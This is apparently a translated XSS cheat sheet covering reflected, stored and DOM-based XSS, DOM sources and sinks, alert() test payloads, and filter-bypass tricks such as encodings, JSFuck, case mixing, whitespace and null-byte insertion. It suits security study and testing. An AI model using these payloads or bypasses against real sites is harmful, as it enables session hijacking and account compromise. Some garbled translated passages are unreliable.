xss
Non-persistent xss attack type : Non-Durable xss attack is a one-time, only to have an impact when the page access times. Non-persistent type xss attack requires the user to access the link after an attacker has been tampered with, when users access the link, is implanted in the attack script is executed the user's browser, so as to achieve the purpose of attack.
Durable xss attack : Durable xss, would attacker's data is stored on the server side, the attacks will be accompanied by attack data has always existed.
Reflection type , storage type , the DOM type
Common test code:
onmouseover="alert(xss);"
<script>alert(xss);</script>
<a href="javascript:alert(xss);">xss</a>
<img onerror="alert(xss);" src=>The main principle: Closed tags, structure malicious code
Enter the user can be constructed, such as the search box Comments district, registered name, contact information, and the page where there is often a hidden attribute input, then change directly burp capture it, the hidden attribute bad clicks, using the following different shortcut ways to achieve code for different browsers, and may conflict with other shortcuts
accesskey="X" onclick="alert(xss)"
DOM XSS is to change the page DOM tree parsing browser, and malicious code does not return to the page in the source code Echo
JS page jump by jump, use location.href, location.replace (), location.assign (), you can execute the script by JS javascript pseudo-protocol
DOM XSS entry point
Location |
URL address of the current page |
window.name |
Current page tab name, it is assigned a different website, which means that this page is window.name assignment and then jump to other sites, window.name value remains unchanged |
document.title |
Is the title of the current page, you can control it in the search box to enter |
document.referer |
Indicate origin, which represents the URL of the page visited over |
postMessage |
HTML5 is a cross-domain mechanism, but developers often do not have the correct source is detected, it will lead to the DOM XSS |
location |
It is usually triggered JS Jump to the way JS URI execution |
eval |
JS JS is a built-in dynamic actuator |
innerHTML |
Can be assigned to a page element |
document.write |
Can output a page flow |
Function |
By a function generation function may be passed dynamically JS code |
setTimeout |
JS code will delay execution |
setInterval |
It represents the cyclic execution of the JS Code |
xss bypass coding
Sometimes site filtering the input characters, then you can be bypassed by coding
principle: the percent will be transcoded and other URL encoding when the URL request; after the browser receives the page data, have HTML entity encoding transcoding; transcoding will JSUnicode and other support for the implementation of JS JS way.
url编码 %+16进制数字 https://www.w3school.com.cn/tags/html_ref_urlencode.html
url base64编码 data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk7PC9zY3JpcHQ+
html编码 '&' + '约定名称' + ';' 的形式,其实还有 '&#' + '十进制数字' + ';' 和 '&#x' + '十六进制数字' + ';' 十进制和十六进制后面的;可以省略
JS Unicode 编码
规则是 '\u' + '四位十六进制数字'
jsfuck https://www.bugku.com/tools/jsfuck/在script标签钟插入一个空格或者是tab
<script >alert(1)</script>
<script >alert(1)</script>
也可以对tab,换行,回车进行编码来绕过
<script	>alert(1)</script>
<script
>alert(1)</script>
<script
>alert(1)</script>
对标签进行大小写
<ScRipT>alert(1)</sCriPt>
插入null字节,在xss payload的任何地方插入null字节,有时候可以绕过filter
<%00script>alert(1)</script>
<script>al%00ert(1)</script>For html ie less than the version attribute of the support 10 which can be used to back quotes `closed double quotes, thereby bypassing the htmlspecialchars ()
Reference Source: https://www.jianshu.com/p/13f0b9a15e46